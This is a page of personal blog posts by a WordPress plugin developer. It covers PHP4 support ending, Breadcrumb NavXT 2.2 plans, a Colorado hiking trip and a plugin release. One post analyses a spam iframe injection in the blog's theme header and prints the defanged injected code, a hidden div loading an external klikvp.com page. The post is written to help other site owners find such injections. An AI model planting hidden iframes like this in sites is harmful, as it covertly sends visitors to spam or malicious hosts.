PHP4 Support Ended

Posted by in Announcements

Starting immediately, PHP4 environments will not be supported for any of my projects. If you are still running PHP4, please upgrade to PHP5. Most web hosts offer concurrent PHP4 and PHP5 support, inquire about upgrading to PHP5.

-John Havlik

[end of transmission, stay tuned]

Klikvp.com Exploite

Posted by in Enemy of the Spammers

Even though things are updated regularly on this blog, an iframe based exploit was discovered today. Unlike the previous iframe attack, which came through a SQL injection, this one involved modified theme files. Unlike the previous googlerank.info iframe attack, this one’s payload does not appear to be malicious, rather it is spammy.

There are a few things that point to some level of sophistication in the injection. First off, the code was injected into the end of the header.php file, only on the active theme. Typically, a script kiddy will not bother figuring out which theme is in use and instead will carpet bomb the place with malicious code. Secondly, the modification date on the file matches the last time the header was uploaded from the testbed. No, the testbed’s code was not compromised. This points to a possible Windows exploit (yes the Weblogs.us server still runs on Windows, unfortunately.) as any changes should have caused the modification date and time to update. Finally, rather than having the iframe hidden via CSS, there is a container div which is hidden instead, making it more difficult to have a general CSS rule to expose the iframe.

< div style="display:none" >< iframe src="http://klikvp.com/css/go.php?sid=1" frameborder="0" height="1" width="1" > < iframe > < div >

That is the offending code. Spaces were added to prevent execution. Klikvp is the same as Klikvip which is a known spammer. The tricky sucker is using a wrapping div now. The good news is that WordPress Exploit Scanner will find this, so keeping it around and periodically scanning is a good thing to do. It doesn’t offer dashboard notifications like Iframe-b-gone does but it scans files and other things that Iframe-b-gone does not.

-John Havlik

[end of transmission, stay tuned]

A Major Shift

Posted by in WordPress > Plugins

As stated before Breadcrumb NavXT 2.2 will be vastly different from 2.1, especially API wise. Work is underway on the core, which when stabilized, will allow work on the administrative interface to take place. This is the second major rewriting of the plug-in done in the last year. Previously, the modifications to the core were made to aid in adding features, and enhance modification to it. However, there where some shortcomings which should be overcome by the new more object oriented approach. So far this is the short list of what is changing:

  • Anchor templates – akin to the WordPress’ custom permalink template, this allows more flexibility (i.e. allows users to set the rel element among other things).
  • Streamlining of the options – options depreciated due to the use of anchor templates, ones that now are already set in WordPress (e.g. the static frontpage option), and ones that were depreciated due to structural changes. The current short list of depreciated options include:
    • URL Title Prefix – obsolete due to anchor templates
    • URL Title Suffix – obsolete due to anchor templates
    • Static Front Page – depreciated in 2.1.3 due to ability to automatically determine this thanks to the WordPress setting “Front page displays” under Settings > Reading.
    • Current Item URL Title – obsolete due to anchor templates
    • Archive by Date Format – reassigned, delimits between a hierarchical date archiving (multiple breadcrumbs in the trail), or the old method following the format specified in the WordPress setting “Date Format” under Settings > General.
  • Deeper WordPress integration – not just with the removal of duplicated options, extensive use of filters should alleviate problems with plugins such as Polyglot and qTranslate (Previous support was via “hacks”.).
  • Reorganization of the Administrative interface – Not only are the options streamlined, option names are more obvious, and grouped in a more appropriate manner. The interface is also tabbed into several virtual pages thanks to some JavaScript magic. This considerably shortens the apparent size of the options page.
  • New Classes – A breadcrumb class and a breadcrumb trail class combine to make the plugin as a whole much more flexible. Unfortunately, this means directly accessing the class does change between 2.1 and 2.2 and thus will require attention from users who directly access the class.

Additionally, a WordPress sidebar widget plugin will be shipped with 2.2.0. This will remove the need for some users to ever touch a theme file, as long as their theme supports sidebar widgets. By this weekend the new core on SVN will be usable, as the bugs are worked out the administrative interface will receive the attention it needs. Around August 8th a Beta will be available, for this much change it is of the utmost importance that some serious testing is done before a formal release is made. If you would like to help test, stay tuned for a post announcing the beta, and report back on your experience.

-John Havlik

[end of transmission, stay tuned]

Back From Elevation

Posted by in General

Going into work this morning was less than desirable. After a week in Colorado, the humidity of Minnesotan summers seem unbearable. The trip was nice, even though it rained on us just about every day, and no I’m not talking about the typical 5:00pm rains.

We made it up to the ~14,000ft summit of Mt. Sneffels. There was a nice 100ft patch of melting snow near the summit that we climbed through while ascending. While my old ASICS GT-2100 running shoes were fine for most of the climb, they lacked proper tread for snow. Thus, it was necessary to use both hands and feet to keep climbing without sliding down. Luckily, a few other groups knew a much better route, which completely avoided the snow for the descent. In its place, was a nice two-foot-wide shelf above a 50ft or so cliff. It was not snow, thus was not a problem.

  • An overlook of Yankee Boy Basin from the summit
  • Looking at the saddle from the summit
  • Blue flowers growing in the saddle
  • Notice the snow
  • 1000 feet to go

There are many more pictures from the trip. I’ll eventually get a pictures page up with the pictures from this trip and from Moab, Utah last year.

I found the manual mode for the SD850, which really helped with the grainy image problems I was having before. Tweaking some other settings further reduced the graininess to the point that point-n-shoot auto mode produced pretty good pictures. All-in-all, the camera is pretty good, it is just different from the previous PowerShots I had.

-John Havlik

[end of transmission, stay tuned]

Mtekk’s Testimonials 1.1.0

Posted by in WordPress > Plugins

Available immediately, Mtekk’s Testimonials 1.1.0 is a substantial improvement to the previous release. This release migrates from MooTools 1.11 to MooTools 1.2. Now requiring a particular domain or TLD is optional. JavaScript dependencies are handled elegantly now through WordPress’ methods. Finally, errors in form entry are now more elegantly reported to the user in a list above the form. Invalid form entries are marked as a member of the ‘merror’ CSS class. Valid entries will retain their data.

-John Havlik

[end of transmission, stay tuned]

Tagged:
Updated: